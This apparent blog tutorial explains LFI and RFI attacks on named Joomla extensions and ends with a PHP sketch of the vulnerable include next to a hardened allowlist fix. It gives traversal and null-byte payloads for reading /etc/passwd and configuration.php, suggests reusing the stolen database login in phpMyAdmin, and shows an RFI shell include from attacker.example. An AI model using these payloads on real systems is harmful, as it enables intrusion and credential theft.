Joomla LFI Local File Inclusions Attack | Joomla RFI Remote File Inclusions Attack
By Valentin
Examples for Joomla local file inclusions
Local file inclusions are a lot of fun. You tell the website which file you want to see, and it shows it to you. You want to view the configuration file that contains the database login credentials? No problem.
You want to view /etc/passwd if Joomla is hosted on a Linux box? You can do that.
Local file inclusions are also a common problem in Joomla extensions. Many of them are vulnerable to this type of attack, and some of them never get fixed. This can lead to a full server compromise, which is not funny any more, at least not for the system administrator.
A typical URL vulnerable to LFI looks like this:
index.php?option=com_blablubb&Item=2&view=guestbookpage
The most commonly affected parameters are:
- controller
- view
- layout
- page
To give you a proper understanding of typically affected URLs, here are some examples I found earlier this year:
URL: index.php?option=com_jejob&view=some_value
Vulnerable Parameter: view
URL: index.php?option=com_jeajaxeventcalendar&view=some_value
Vulnerable Parameter: view
URL: index.php?option=com_jradio&controller=some_value
Vulnerable Parameter: controller
((I didn't find this one.))
Now let's see how we can use this:
index.php?option=com_jradio&controller=../../../../etc/passwd%00
In this case we need the famous null byte (%00). The component's PHP script appends a fixed suffix such as .php to the parameter before including it; on PHP versions before 5.3.4 the null byte terminates the path, so the appended suffix is ignored and the traversal reaches the real file. Since PHP 5.3.4 paths containing a null byte are rejected, so this bypass only works on older installations.
In the example above the controller parameter is used to include a file from the local disk. Because /etc/passwd contains no PHP tags, include() simply outputs it, and this file contains useful information for us.
If you are not familiar with local file inclusions, I recommend looking up a tutorial, since I will not explain the details here.
Now, with the knowledge of an LFI vulnerability within a Joomla component, we can try to access Joomla's configuration.php. This file contains very interesting information: the database host, user name, password and table prefix.
Since many LFIs also reveal PHP source code, we try this one:
index.php?option=com_blabla&view=../../../configuration.php
If the source code of the file is shown, we receive the login data for the current database user. Note that a plain include() executes configuration.php instead of displaying it (the file only defines a class and prints nothing), so whether you see the source depends on how the component reads the file. Now find a phpMyAdmin login on the same server and try to log in with this data.
You now have access to all Joomla tables and can basically do what you want.
Examples for Joomla remote file inclusions
A typical RFI URL looks like an LFI URL. To give you a better feeling for how to spot an RFI vulnerability within seconds, here are some examples:
URL: index.php?option=com_sef&Itemid=&mosConfig_absolute_path=.
Vulnerable Parameter: mosConfig_absolute_path
URL: index.php?option=com_jomestate&task=.
Vulnerable Parameter: task
When you have found an RFI vulnerability, try to include a PHP shell hosted on another box, for example task=http://attacker.example/shell.txt. The included file is executed by the target's PHP interpreter, so you can browse all Joomla files, download them, change them, remove them... This only works if allow_url_include (and allow_url_fopen) is enabled in php.ini; allow_url_include is off by default since PHP 5.2, so many newer installations are not exploitable this way even when the parameter is unfiltered.
No Joomla installation is safe once an RFI has been exploited.
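To make the LFI and RFI cases above concrete, here is an added example (not code from the original post and not from any real Joomla component) of the include pattern behind both the controller/view LFI examples and the task RFI example, next to a hardened version. The component name com_example, the controllers/ directory, the three controller names in the allowlist and the controller parameter are all assumptions made for illustration.

```php
<?php
// Added example, not code from the original post or from any real Joomla
// component. com_example, the controllers/ directory, the allowlisted
// controller names and the 'controller' parameter are assumptions.

// ---- The vulnerable pattern (do not deploy) -------------------------------
// The request parameter is concatenated straight into an include path, the
// same shape as the controller/view/layout/page examples above.
function loadControllerVulnerable($base, $name)
{
    // controller=../../../../etc/passwd%00
    //   Traversal leaves $base; /etc/passwd holds no "<?php" tag, so
    //   include() just prints it. The trailing NUL byte (%00) cut the
    //   appended ".php" off on PHP < 5.3.4; newer PHP rejects such paths.
    // controller=../../../configuration.php%00
    //   Included as code, not printed: the file defines a class and echoes
    //   nothing, so a plain include does not disclose the credentials.
    // controller=http://attacker.example/shell.txt%00
    //   Remote file inclusion when allow_url_include=On: the shell runs here.
    include $base . $name . '.php';
}

// ---- The hardened pattern ------------------------------------------------
// Known controllers only; the request value selects a key and is never used
// to build a path from raw input.
const ALLOWED_CONTROLLERS = array('guestbook', 'entry', 'search');

function loadControllerSafe($base, $name)
{
    if (!in_array($name, ALLOWED_CONTROLLERS, true)) {
        return false;                       // unknown name: refuse, do not guess
    }
    $path = realpath($base . $name . '.php');
    $root = realpath($base);
    // Defence in depth: the resolved file must exist and sit under $base,
    // so even a mistake in the allowlist cannot reach outside the directory.
    if ($path === false || $root === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return false;
    }
    include $path;
    return true;
}

$base = __DIR__ . '/controllers/';
$name = isset($_GET['controller']) ? (string) $_GET['controller'] : 'guestbook';
if (!loadControllerSafe($base, $name)) {
    http_response_code(404);
    echo 'Unknown controller';
}
```

Save it as index.php with a controllers/ directory beside it and request it with controller=guestbook, then with controller=../../../../etc/passwd%00, to see the two functions behave differently. Joomla's own request filter (JRequest::getCmd(), the CMD filter of JFilterInput) strips everything except letters, digits, underscore, dot and dash, which already removes the slashes and the null byte; the allowlist goes one step further and also stops an attacker from loading an unintended .php file that happens to live under the component's directory.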